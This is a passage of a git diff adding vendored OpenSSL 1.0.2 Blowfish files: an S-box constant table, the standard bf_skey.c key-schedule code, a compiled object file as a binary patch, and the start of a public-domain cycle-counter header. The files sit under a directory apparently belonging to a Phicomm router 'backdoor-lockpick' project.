+                                0x55533a3aL, 0x20838d87L, 0xfe6ba9b7L,
+                                0xd096954bL,
+                                0x55a867bcL, 0xa1159a58L, 0xcca92963L,
+                                0x99e1db33L,
+                                0xa62a4a56L, 0x3f3125f9L, 0x5ef47e1cL,
+                                0x9029317cL,
+                                0xfdf8e802L, 0x04272f70L, 0x80bb155cL,
+                                0x05282ce3L,
+                                0x95c11548L, 0xe4c66d22L, 0x48c1133fL,
+                                0xc70f86dcL,
+                                0x07f9c9eeL, 0x41041f0fL, 0x404779a4L,
+                                0x5d886e17L,
+                                0x325f51ebL, 0xd59bc0d1L, 0xf2bcc18fL,
+                                0x41113564L,
+                                0x257b7834L, 0x602a9c60L, 0xdff8e8a3L,
+                                0x1f636c1bL,
+                                0x0e12b4c2L, 0x02e1329eL, 0xaf664fd1L,
+                                0xcad18115L,
+                                0x6b2395e0L, 0x333e92e1L, 0x3b240b62L,
+                                0xeebeb922L,
+                                0x85b2a20eL, 0xe6ba0d99L, 0xde720c8cL,
+                                0x2da2f728L,
+                                0xd0127845L, 0x95b794fdL, 0x647d0862L,
+                                0xe7ccf5f0L,
+                                0x5449a36fL, 0x877d48faL, 0xc39dfd27L,
+                                0xf33e8d1eL,
+                                0x0a476341L, 0x992eff74L, 0x3a6f6eabL,
+                                0xf4f8fd37L,
+                                0xa812dc60L, 0xa1ebddf8L, 0x991be14cL,
+                                0xdb6e6b0dL,
+                                0xc67b5510L, 0x6d672c37L, 0x2765d43bL,
+                                0xdcd0e804L,
+                                0xf1290dc7L, 0xcc00ffa3L, 0xb5390f92L,
+                                0x690fed0bL,
+                                0x667b9ffbL, 0xcedb7d9cL, 0xa091cf0bL,
+                                0xd9155ea3L,
+                                0xbb132f88L, 0x515bad24L, 0x7b9479bfL,
+                                0x763bd6ebL,
+                                0x37392eb3L, 0xcc115979L, 0x8026e297L,
+                                0xf42e312dL,
+                                0x6842ada7L, 0xc66a2b3bL, 0x12754cccL,
+                                0x782ef11cL,
+                                0x6a124237L, 0xb79251e7L, 0x06a1bbe6L,
+                                0x4bfb6350L,
+                                0x1a6b1018L, 0x11caedfaL, 0x3d25bdd8L,
+                                0xe2e1c3c9L,
+                                0x44421659L, 0x0a121386L, 0xd90cec6eL,
+                                0xd5abea2aL,
+                                0x64af674eL, 0xda86a85fL, 0xbebfe988L,
+                                0x64e4c3feL,
+                                0x9dbc8057L, 0xf0f7c086L, 0x60787bf8L,
+                                0x6003604dL,
+                                0xd1fd8346L, 0xf6381fb0L, 0x7745ae04L,
+                                0xd736fcccL,
+                                0x83426b33L, 0xf01eab71L, 0xb0804187L,
+                                0x3c005e5fL,
+                                0x77a057beL, 0xbde8ae24L, 0x55464299L,
+                                0xbf582e61L,
+                                0x4e58f48fL, 0xf2ddfda2L, 0xf474ef38L,
+                                0x8789bdc2L,
+                                0x5366f9c3L, 0xc8b38e74L, 0xb475f255L,
+                                0x46fcd9b9L,
+                                0x7aeb2661L, 0x8b1ddf84L, 0x846a0e79L,
+                                0x915f95e2L,
+                                0x466e598eL, 0x20b45770L, 0x8cd55591L,
+                                0xc902de4cL,
+                                0xb90bace1L, 0xbb8205d0L, 0x11a86248L,
+                                0x7574a99eL,
+                                0xb77f19b6L, 0xe0a9dc09L, 0x662d09a1L,
+                                0xc4324633L,
+                                0xe85a1f02L, 0x09f0be8cL, 0x4a99a025L,
+                                0x1d6efe10L,
+                                0x1ab93d1dL, 0x0ba5a4dfL, 0xa186f20fL,
+                                0x2868f169L,
+                                0xdcb7da83L, 0x573906feL, 0xa1e2ce9bL,
+                                0x4fcd7f52L,
+                                0x50115e01L, 0xa70683faL, 0xa002b5c4L,
+                                0x0de6d027L,
+                                0x9af88c27L, 0x773f8641L, 0xc3604c06L,
+                                0x61a806b5L,
+                                0xf0177a28L, 0xc0f586e0L, 0x006058aaL,
+                                0x30dc7d62L,
+                                0x11e69ed7L, 0x2338ea63L, 0x53c2dd94L,
+                                0xc2c21634L,
+                                0xbbcbee56L, 0x90bcb6deL, 0xebfc7da1L,
+                                0xce591d76L,
+                                0x6f05e409L, 0x4b7c0188L, 0x39720a3dL,
+                                0x7c927c24L,
+                                0x86e3725fL, 0x724d9db9L, 0x1ac15bb4L,
+                                0xd39eb8fcL,
+                                0xed545578L, 0x08fca5b5L, 0xd83d7cd3L,
+                                0x4dad0fc4L,
+                                0x1e50ef5eL, 0xb161e6f8L, 0xa28514d9L,
+                                0x6c51133cL,
+                                0x6fd5c7e7L, 0x56e14ec4L, 0x362abfceL,
+                                0xddc6c837L,
+                                0xd79a3234L, 0x92638212L, 0x670efa8eL,
+                                0x406000e0L,
+                                0x3a39ce37L, 0xd3faf5cfL, 0xabc27737L,
+                                0x5ac52d1bL,
+                                0x5cb0679eL, 0x4fa33742L, 0xd3822740L,
+                                0x99bc9bbeL,
+                                0xd5118e9dL, 0xbf0f7315L, 0xd62d1c7eL,
+                                0xc700c47bL,
+                                0xb78c1b6bL, 0x21a19045L, 0xb26eb1beL,
+                                0x6a366eb4L,
+                                0x5748ab2fL, 0xbc946e79L, 0xc6a376d2L,
+                                0x6549c2c8L,
+                                0x530ff8eeL, 0x468dde7dL, 0xd5730a1dL,
+                                0x4cd04dc6L,
+                                0x2939bbdbL, 0xa9ba4650L, 0xac9526e8L,
+                                0xbe5ee304L,
+                                0xa1fad5f0L, 0x6a2d519aL, 0x63ef8ce2L,
+                                0x9a86ee22L,
+                                0xc089c2b8L, 0x43242ef6L, 0xa51e03aaL,
+                                0x9cf2d0a4L,
+                                0x83c061baL, 0x9be96a4dL, 0x8fe51550L,
+                                0xba645bd6L,
+                                0x2826a2f9L, 0xa73a3ae1L, 0x4ba99586L,
+                                0xef5562e9L,
+                                0xc72fefd3L, 0xf752f7daL, 0x3f046f69L,
+                                0x77fa0a59L,
+                                0x80e4a915L, 0x87b08601L, 0x9b09e6adL,
+                                0x3b3ee593L,
+                                0xe990fd5aL, 0x9e34d797L, 0x2cf0b7d9L,
+                                0x022b8b51L,
+                                0x96d5ac3aL, 0x017da67dL, 0xd1cf3ed6L,
+                                0x7c7d2d28L,
+                                0x1f9f25cfL, 0xadf2b89bL, 0x5ad6b472L,
+                                0x5a88f54cL,
+                                0xe029ac71L, 0xe019a5e6L, 0x47b0acfdL,
+                                0xed93fa9bL,
+                                0xe8d3c48dL, 0x283b57ccL, 0xf8d56629L,
+                                0x79132e28L,
+                                0x785f0191L, 0xed756055L, 0xf7960e44L,
+                                0xe3d35e8cL,
+                                0x15056dd4L, 0x88f46dbaL, 0x03a16125L,
+                                0x0564f0bdL,
+                                0xc3eb9e15L, 0x3c9057a2L, 0x97271aecL,
+                                0xa93a072aL,
+                                0x1b3f6d9bL, 0x1e6321f5L, 0xf59c66fbL,
+                                0x26dcf319L,
+                                0x7533d928L, 0xb155fdf5L, 0x03563482L,
+                                0x8aba3cbbL,
+                                0x28517711L, 0xc20ad9f8L, 0xabcc5167L,
+                                0xccad925fL,
+                                0x4de81751L, 0x3830dc8eL, 0x379d5862L,
+                                0x9320f991L,
+                                0xea7a90c2L, 0xfb3e7bceL, 0x5121ce64L,
+                                0x774fbe32L,
+                                0xa8b6e37eL, 0xc3293d46L, 0x48de5369L,
+                                0x6413e680L,
+                                0xa2ae0810L, 0xdd6db224L, 0x69852dfdL,
+                                0x09072166L,
+                                0xb39a460aL, 0x6445c0ddL, 0x586cdecfL,
+                                0x1c20c8aeL,
+                                0x5bbef7ddL, 0x1b588d40L, 0xccd2017fL,
+                                0x6bb4e3bbL,
+                                0xdda26a7eL, 0x3a59ff45L, 0x3e350a44L,
+                                0xbcb4cdd5L,
+                                0x72eacea8L, 0xfa6484bbL, 0x8d6612aeL,
+                                0xbf3c6f47L,
+                                0xd29be463L, 0x542f5d9eL, 0xaec2771bL,
+                                0xf64e6370L,
+                                0x740e0d8dL, 0xe75b1357L, 0xf8721671L,
+                                0xaf537d5dL,
+                                0x4040cb08L, 0x4eb4e2ccL, 0x34d2466aL,
+                                0x0115af84L,
+                                0xe1b00428L, 0x95983a1dL, 0x06b89fb4L,
+                                0xce6ea048L,
+                                0x6f3f3b82L, 0x3520ab82L, 0x011a1d4bL,
+                                0x277227f8L,
+                                0x611560b1L, 0xe7933fdcL, 0xbb3a792bL,
+                                0x344525bdL,
+                                0xa08839e1L, 0x51ce794bL, 0x2f32c9b7L,
+                                0xa01fbac9L,
+                                0xe01cc87eL, 0xbcc7d1f6L, 0xcf0111c3L,
+                                0xa1e8aac7L,
+                                0x1a908749L, 0xd44fbd9aL, 0xd0dadecbL,
+                                0xd50ada38L,
+                                0x0339c32aL, 0xc6913667L, 0x8df9317cL,
+                                0xe0b12b4fL,
+                                0xf79e59b7L, 0x43f5bb3aL, 0xf2d519ffL,
+                                0x27d9459cL,
+                                0xbf97222cL, 0x15e6fc2aL, 0x0f91fc71L,
+                                0x9b941525L,
+                                0xfae59361L, 0xceb69cebL, 0xc2a86459L,
+                                0x12baa8d1L,
+                                0xb6c1075eL, 0xe3056a0cL, 0x10d25065L,
+                                0xcb03a442L,
+                                0xe0ec6e0eL, 0x1698db3bL, 0x4c98a0beL,
+                                0x3278e964L,
+                                0x9f1f9532L, 0xe0d392dfL, 0xd3a0342bL,
+                                0x8971f21eL,
+                                0x1b0a7441L, 0x4ba3348cL, 0xc5be7120L,
+                                0xc37632d8L,
+                                0xdf359f8dL, 0x9b992f2eL, 0xe60b6f47L,
+                                0x0fe3f11dL,
+                                0xe54cda54L, 0x1edad891L, 0xce6279cfL,
+                                0xcd3e7e6fL,
+                                0x1618b166L, 0xfd2c1d05L, 0x848fd2c5L,
+                                0xf6fb2299L,
+                                0xf523f357L, 0xa6327623L, 0x93a83531L,
+                                0x56cccd02L,
+                                0xacf08162L, 0x5a75ebb5L, 0x6e163697L,
+                                0x88d273ccL,
+                                0xde966292L, 0x81b949d0L, 0x4c50901bL,
+                                0x71c65614L,
+                                0xe6c6c7bdL, 0x327a140aL, 0x45e1d006L,
+                                0xc3f27b9aL,
+                                0xc9aa53fdL, 0x62a80f00L, 0xbb25bfe2L,
+                                0x35bdd2f6L,
+                                0x71126905L, 0xb2040222L, 0xb6cbcf7cL,
+                                0xcd769c2bL,
+                                0x53113ec0L, 0x1640e3d3L, 0x38abbd60L,
+                                0x2547adf0L,
+                                0xba38209cL, 0xf746ce76L, 0x77afa1c5L,
+                                0x20756060L,
+                                0x85cbfe4eL, 0x8ae88dd8L, 0x7aaaf9b0L,
+                                0x4cf9aa7eL,
+                                0x1948c25cL, 0x02fb8a8cL, 0x01c36ae4L,
+                                0xd6ebe1f9L,
+                                0x90d4f869L, 0xa65cdea0L, 0x3f09252dL,
+                                0xc208e69fL,
+                                0xb74e6132L, 0xce77e25bL, 0x578fdfe3L,
+                                0x3ac372e6L,
+                                }
+};
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/bf_skey.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/bf_skey.c
new file mode 100644
index 0000000..2cb3c66
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/bf_skey.c
@@ -0,0 +1,125 @@
+/* crypto/bf/bf_skey.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <string.h>
+#include <openssl/crypto.h>
+#include <openssl/blowfish.h>
+#include "bf_locl.h"
+#include "bf_pi.h"
+
+void BF_set_key(BF_KEY *key, int len, const unsigned char *data)
+#ifdef OPENSSL_FIPS
+{
+    fips_cipher_abort(BLOWFISH);
+    private_BF_set_key(key, len, data);
+}
+
+void private_BF_set_key(BF_KEY *key, int len, const unsigned char *data)
+#endif
+{
+    int i;
+    BF_LONG *p, ri, in[2];
+    const unsigned char *d, *end;
+
+    memcpy(key, &bf_init, sizeof(BF_KEY));
+    p = key->P;
+
+    if (len > ((BF_ROUNDS + 2) * 4))
+        len = (BF_ROUNDS + 2) * 4;
+
+    d = data;
+    end = &(data[len]);
+    for (i = 0; i < (BF_ROUNDS + 2); i++) {
+        ri = *(d++);
+        if (d >= end)
+            d = data;
+
+        ri <<= 8;
+        ri |= *(d++);
+        if (d >= end)
+            d = data;
+
+        ri <<= 8;
+        ri |= *(d++);
+        if (d >= end)
+            d = data;
+
+        ri <<= 8;
+        ri |= *(d++);
+        if (d >= end)
+            d = data;
+
+        p[i] ^= ri;
+    }
+
+    in[0] = 0L;
+    in[1] = 0L;
+    for (i = 0; i < (BF_ROUNDS + 2); i += 2) {
+        BF_encrypt(in, key);
+        p[i] = in[0];
+        p[i + 1] = in[1];
+    }
+
+    p = key->S;
+    for (i = 0; i < 4 * 256; i += 2) {
+        BF_encrypt(in, key);
+        p[i] = in[0];
+        p[i + 1] = in[1];
+    }
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/bf_skey.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/bf_skey.o
new file mode 100644
index 0000000000000000000000000000000000000000..ece39224a6d7da8621465d636ef5620f73bc10ca
GIT binary patch
literal 6248
zcmbtYbzGFq_J1fT-K7?37NwO%5T%!pSOp2`5O(QYYLP~f5MEkDBqYQj1*JO$L?i|2
z7AYwy$-9g2Uat4O|NMUE^O>1*zVkgZb7s!-{BiEfD=XmR;Q=Rt2f%@UTPG+0%+mZ@
zmp)RZ0T6Hw_z7m&k<mn$HkDBk0stcX8g5Pt5wfp=@L!}bLxeJMaAOffh#@<Pz>xno
z;^(Vs#1YVi0IN0$Y$EVFmBVH5z{RA>qP5Ckh5EV)5*cu@$n9_h9%+ZNXbTo=4f*vO
z6}^q6;?UpB?<6;|EO~G-AV=Da5N$zVsRG_b0OGI-;eSBo`Wn$p$c{UZz|hT*X++49
za>(~toE=KY9wNsKgvzlKVn;%Re*+1^e;468EHLz6EW|NO`H1DW3s3-n>i`ZVF+*G>
zJPHp(bhIqOzmdY=u8d&=Zjav*Y$L_qLy{f{`-`4h&c%`7f(Yr$PJtAjXFD*G5IdE{
z88&WtH|kE24hzj{yR&mbB|JH`BWm6si+Tg3&XXz@4fN7JX594%c}*_Rl~XkKY{+?^
zzhsP|^GDu9=~G`$8~G^j^7#9gR~6&a*thJW3ntg_NND#W0{fxXrq(JtPU#1_FMTCr
z)*~^o=X8rBoOM5kIxXFTJY;^U=~bksUoYBwC5alj#(Ocp>%&SQlAF#$rgd3ls5F1r
zBLYMxh71KI+rj^0$**&ReC1LSs2b$Yb4MB?wSIDF%{<B0$})L|(2=H@HMJ3K)hedQ
z<`pt*D{P;Yq09@?OpBRw_NJs+D&VbjFunUB^U|gO9flTe*v=C3DDi4}U!GwHyPcng
zpr>0<EcY`+q<CJLk}czGO=Aojw?!LiKPoztZ5Ns2jSzgWc=ztzfaQ0tfphp5IfsK8
z%@_ROAs0X7Jni}EU=J3RUH5+|M-C%|2E4qr(qe6t$eJu`)x?%yH@AsOI%~NS+>_m%
zs%~S&ui4N22K+Srs(Q8^`7(N1+>=^uMZEkO@2)Si`D)rdygX63UaLhg=*C0(prx?F
z6bJc+R{=iNMxo;Ut`6fa(7M1BIR@$1Hg(!2Sv@Le+@!8Mj~y^d;wQ?of9(`TP?2@^
z%!7v#Ygcc6bk-pDVvK*#@9~9WYjk##LG55lT-l?zYTPca{7fxjv1(>rBQiz0KH1R7
zl--6t&tcc9NW%`k@LrVKVeyVQtNNb(<=88Ua`Jv{q*X?Fgq>5>`?s!+5_5ws3Y1{<
zIvJm8!I&0#QDgG%q1~Rcs#*^%GC?Fm6Oh*D;e1*8fFs4SEuD3Dd+t@l_65PAF<Ms%
zh%IWrg++}&`wmg=PLZS_^3lb8gqMKE!!ZC}p<|ew8s^Xn(|*J-WPN^YGefqw;n0`6
zNzgLKMN2g-pUc3yMYpx$Zu;RwD&<P)Gszu_Qh&C6yP~~Y20dMT9@82L=JMOcl{X{0
zqvCdz2G>R=uKIp@DMP($GTSuWKG+If##45?evs_jS;)G2>Gt4I?6c^ow@wkc^QpZt
zww+xOo#PzMdHe<v5hYJtBX%b@Bh4;Rtx=T*2Q#gli%K=hRb^_3w2EHs=*q3jD4@H*
z&+m2~RDHnbI-kah9|~?u{WgnnDC+x}Ll-|8(mt-5QCKogz3(U9=sl2;+imf}n3l*b
z_5qDcTZ|hG1DiQCcP413$ZbPbv$^Bi^WC#~pBGX?;9fn9GJQ9FS>E!2H~^ypCujv=
zbs=xOR44Je89PfE=?ZhSsaDqOF};u*b?)~y^aoxT_&`6DeZ#*;!0Dga5o=;a-$E&K
z%SEM?PqE-uCXLq}K%Ei7qmdw`1MZt{O02y15_t*0%=i^Kl#{T|G3wYZK3#(hoa1FP
zH!UvyRrVc5By?z|9r)ocU%p0KWJ+edVmXNoaUgom(Njr|r=SQ%>N<3hlfE(kH9FU4
z?9I(m<WiEw`yY``VOfiZ=M${$?wDy$B)_YFg@2u%N14=Bnp!UvE=D(<@Jv(6{JE?_
z-*lvHpVU@7aZ-2M#+BLS84<qQb$2;df}kVHoC}TtO>+-TjoMi7rEIN8KQ5QUY3Sl4
z(j0AU1Fqe-3Ytv4L!^;ZB2287#S}mcH+(yKe^JgSqI8W`M|e;y|J+%%6+%{~mBRu6
zpJC(d+xM6v30+Trjw&|N;a}9zU7P%w-Y$xQPw*5sF8F=>CN?}+FD!JgsO8Pb&jbaO
zTqcO16AW)|S(IUMeHs5*WRf2=FP>KMKv19nPA3wosX|g_uS#%E)}e-wY%_|g^s<L{
z9J_PAhjv~_UL~tr!YBnv%mCHf&;poL$1tlil@_~`Eo^3lLG97!fD}4KUC;A_B$&#C
zl*%w4r8%)h&&3_)z#)qpq^8{sW{rw;Ov@w#5J6$_8zZ#k_3Srpr%|aln)BiVPt-=H
z#i*0F$DFiO1StC4a{LnMDUDaPuMyfdr+*cvqm&?h#jf{bCUR|OcQx*EO?fg}0>a`b
zKNa-OVQ!wx2ozMn3)g4*&g!;vMpC70*qjH<{5`%e1pa`d#o~_pM`f5z0Yy?d2-4&}
zKlwyMV(-;D9~sLVm8~_&OU&27oTBtdk9vBNHy7^|Q&DfB4{{eQSR3YJ<twNBTfAO(
z3EzLmeHezfJR;ceO5d(JkWJSd|5>&b_*MIocr5==uFo=W06*G*yO<5)h$7~3RUBEQ
zfTW<VWVBH~twJrZ90(C~m=a_~8M+jSzHn3~PfqTo8O{1s8PvA)=CTPg+b}x`9q{vg
z9!scM>q-@Unf1j~wF-T6L47Off<j)2-nnFftx~pHdUDOg_*COZzVTbJ89tIG3BkhK
zZhTX5#xXxA{iv*Hd4jKj`dDY0)5b=h#+U25zY5sUF?GJcc-Y{d_*9{uVS%jRv*s0;
z#x!Cel3SqCetB&{cmA+R2=#;ez(vA)X@KU|-Ki3@S(>{Pvg6cnXz}Ed{Csv+Iz-iO
zs8jXRj_kT@b5VuOGPAg<IT71unPd-^{^r|(K{kp?(`qJul51%u9SWS`2C4qRd+Ei^
zbq(y0`;Rf7tjYfhPz-$kSR1G@AbpOY&&9kmp#eY-FY<=V>dtRyorSOGGNT-&E<Rpy
zzAEDz6TZ4=+&3hC!A?(j)EkLe`t)WkP#P`h)*kSH_;s?{HoaE=^6a&^0aVr->&*Hy
zXFu#^6Y3AQl0SfX$|VN~$u|&L_U?a7W&!mKxeR>{)}rtjG`5t!VL4?k)cB!a1n!i)
z%`FK%v|s(s28Y~|%#Xa3GBvZ6>px_rFFCg*?e~O<Q+ZQ}$NI?@6e6?r1^*t*cD>RH
zc=5%Fo#cznI`nGEmy#QKC_oLiDaxWC&mM<SWuuV}4y|F{i@lu}UG%hPWZhAoKh<K9
zw6Z2Ju8N@3KIcAR;3t6su7#&EqWfAiiX4LpWUbj8?rPlYJcJs9L6^yP?ThD3Xojr-
zYsA-=wIHjd@HDO$2U4nGxsPVgjE5B!_pN(+v$SU|8VmQtr@Oby^4dyYOFn>>1^yh!
z{wlf@szN2cweyi#o6cTIz#^UVecaSMW(O@Mc*9_1>${BAF4VnMWrJ)tuHc|QM_XE+
zD;7~MCZ?hFDBK@fl4*OO6#KNZ(lSF!Hvy7n%9Gi4b!Z}9`xfu(UmOBbOup+z-U2*P
z__N#lj{IDNhLDN}Q<u4k5Rkgq3-(RZQq*;b;UIAH(#K!KU{*qzmmZ4J=h4A;7u1af
zyJ{1ABkL;H%&t+&2)TQ4Ad`5J>9gBojCQ81^@UWRWWfpiE>(*>h+kLhc<e>niO2A(
zCgkkm7s{%aKrh}0#-A&n2|MdN%Dwf1Pu`uXbN@+6tO<#a*~&)ScZc+wnmY)eM_l{Q
z8(6~OKV?i6$uNho_-wR;nDGAgI&zpQV|!#FO?iSb{+um(h(gP&N%*p*z4#Y%F2dQ)
z;pTHZtLcY8+hee35%~|W^=^unMUu}@J9$TRYPu0*Aef)Jf<4zjy~g8-*FvB8y#ko1
zu!kOHTihh)13m%R`kP!?EAdM<O>N4qR7|TdcVSs7oA2t6OJ*w4&ZwF0D$!BcGVJ_l
zrR=Zbko?#%F{wu@D;GpfMTTBHJHR`i-K%1mXJ(ucG#ETrQ+?1dZKm^}@_A70*2=b*
zJMuP?0IA@=-<8iQvPt+>-mPu#`q!(rvi?rlEGv&>9^@Mv0TR_Zsc!6VXRG366|_(=
z-I~aCU6mL6BWohdnDzRqkVg%_EHp3?1ua@@u7za-dkQGd1<!yn=1>oiO~7QVadd<p
zTES7L5E`x38>T#p|8XLRysVSxVFkh@gEBc2<62CAzl3x+b3Bcd&*G|rU?V=O{%lzF
z3Mofw{4I(DG&8eg8N=AiSLEQepfu}MD{lY6lHr3hqB@D~lWBMEe^$jaqEy@QKl7%s
z2tSppbLJdZ*mi<Ukd)gQWn@FqnG6)S=lPZKppDurT_j-QGkoQ1@(iWvyvW5TBlQ|W
zwDtAcOP?x6iz}njeD)UZG3&LHP7^r<<9RDdk~xdAdq4IzcAg3<dw$!w(4dZCuQa*G
zT}$&v(W^a@9&gG1MsV(Jqh&Rg?HSa&0h+)U64dH;-<x|K8dWB=+iQ5Q3%4|l2ni;9
zrFv-kIARB6ISwGDh1*5NIyQECgx%`18TmfwCtKzl$_l5eN^?EzsZOkne;z^E3vmJ0
z_%iYJc{Kvfwv1sV@=<AQ)$h>n3(?nY__Gl@9_S~P-S^U)TIz3_FKvT0d`80+n8{pv
zn{Ib14^@crs40|Z&T_`)5Kb9Yuk`MuC8+b+OolC+URVlBD6J2v-Gs5<$Rc2Q^|Es<
zsT@`7f7@m*Q4R7fvd_S*{MQRk?g=rmH$kzPN^>S!%RS5d&4XKawyYfprS!;l+#s3L
z5AcHWALY)FCdPb&i|g-4&Bc8cN**X#xvU;~312Ly_o>foAG|(zM;AArk9P-03TtBN
zTCQ_ppT6=&u)b3c&-lzM`tkjoe8t3_m>=PdJ+o~(;@mtIz1!R{YL93<V|Oj2>km25
z)2%S0o~bYPM38d(^<WNE8bQ^H84)CTq2Yy2l*A$fR~#>~SZ1QV6ypY)Da)=!(gyv{
zVNULWtF9aSTJIhTX%kdPl>bHPrp~=RKvr+5-j;3rIJZsx{Os+B;VU90y3d89e?epF
zqde!^z2LiM?QH6T)v9j3Q^gqyk~|I88l#8@Gt_1jByV4^zqcRR=L@v9U?V0aQ%EQn
zsg*bD7`4-V+X7`8*{U{>4%cP8kJsH+F;!^mYx816{!mX$j_ew|_j6%oM*F;TMS$7P
zTPlliMF)u*)9J+S<h%TujBfRB9Zgj>!_R>*I@AW=ooJo6@A_!uk$jStZksGru~Fz2
z3dn=taTDfGFpE8lEleprgGfcUKNOd8c$f{nro_yEx6S3u^$rO^4NJv*zvLlSQN<xI
zG$9(Cs^rnGUh+|p|6@68s&5O^_-0pgWdkK%M|0L}+RaB%3<*`LUp|cvc8Uy=_3}1|
z5?Ef3Zt@oR6|Q>e-FS&!@|IY|#*IVz-nAt80j|pz;%a#JW*|;`(O?e9lSEX^x1EKg
z;&wf=jQXyOaw;R@y5h4oL{sK!-4wDf2|j_)i{s)$&uFVtpDCNoxeE%$vZjnZ?is%%
zl-k3x<`g1>A!7^^N>_q9Re$Igyw?z(a%~L8AD^h`Kt98~ItA7oRQ?v-KgiPIVbbp4
z3;%5Kj*gay`SSjU?#O`n3%i>-KQC@vyeIft;95ou{^vGr6Tg+5q6Js|xa+j&Hka<;
z$0kolJ8zcxF-EB=(`Yw2RW&!wkkNPwp6Q&BPw-l6*w@JV2!Jz8CTln<HoL2?5m{3?
zUBD-N@7?jK_)^ln&$Vz$jh-oKT4YtW$V#pvM-o(|{9e1l)`zq_Hzd*(s&eotus?kE
zul!$Gp1xVXlnv_<^kIMP;!oQ&;Qg9d=(FDb5|uh?_?nM{R4QeLq+SrEQerUa);={B
zsWao;AO<MjxFH7R)-rKLV_c!4u&b~ud;-F*N2Y+U;1$>vA)epx@45rF7=tTR07TfP
zsG<en13)bfBfvJCoRo9$JnsN_?i6^8XNgIou!Wz?*g2*n1_03F3PB1WiZFaN5M2;~
z90=-9C<nTN{}Tk20ny2TC}cq-$JGBCaIS>F>fwJ)U;%=EtT5s5lhggD7XfyqKZP6%
z;2lNxdj^3E_E-o`;U^ewBmjs{n}6#Bz(0pU0FeI8Ijs-?XHJ_(IyJVZIu+N^-C;2n
zY&&(dBQCBJ`X9K||G)tg3u6~sa}Ss)PP0Z^V*ptNV;6IbF%|@j6_r(GWt5Fo6%;h&
zHH|f8WR>NOaRhU;sk4V81~4{u!JtfSjZLj=jV(~tb^s;r5Lm(H#ZfeShri|h5sG^|
z09)MyfD^p`f8eCY#X=k(bczo>=Hu4KwZ8@C;$e?LnE)^sjPvi&>O^xkw?n}&=I$5(
zW`@F`0GNr33jlL=_-&Xv*xQ?<v2$n#j5!RO(|kuE9ov>@SD2%-gQK}K#slkvTglwY
z*uoiQZ~phz{~ra4b;gDI=gUiDF`S&d_iyVr_e95yjM#>|BWY|qE!()n!3y%I2Y}ys
z4g8&vbjLU+cEs)f=NF=VeE-L^zlT3z+;@%3^8c&90M-|`=6}2;)<zz0bo%?l!T=Q4
zof1*3j-y^Vh2hkU<3zml2Y$Tlkq>T47TZp+)6|}mL_Q7v1NROV!+rgKp1=RtABvqj
zEr0$IY_OBK{r~jeKK4hPcE;*|`s1?jpWa{h_(y#5&bar-{dG?KPw;=*8%qPEsc=02
wSRG%^S*(s*<4=Fwnt#4M76LMk^G^+DoRUB98W-k2`8yt;A9KnVr~c{xFSO<a#Q*>R

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/bfs.cpp b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/bfs.cpp
new file mode 100644
index 0000000..d74c457
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bf/bfs.cpp
@@ -0,0 +1,67 @@
+//
+// gettsc.inl
+//
+// gives access to the Pentium's (secret) cycle counter
+//
+// This software was written by Leonard Janke (janke@unixg.ubc.ca)
+// in 1996-7 and is entered, by him, into the public domain.
+
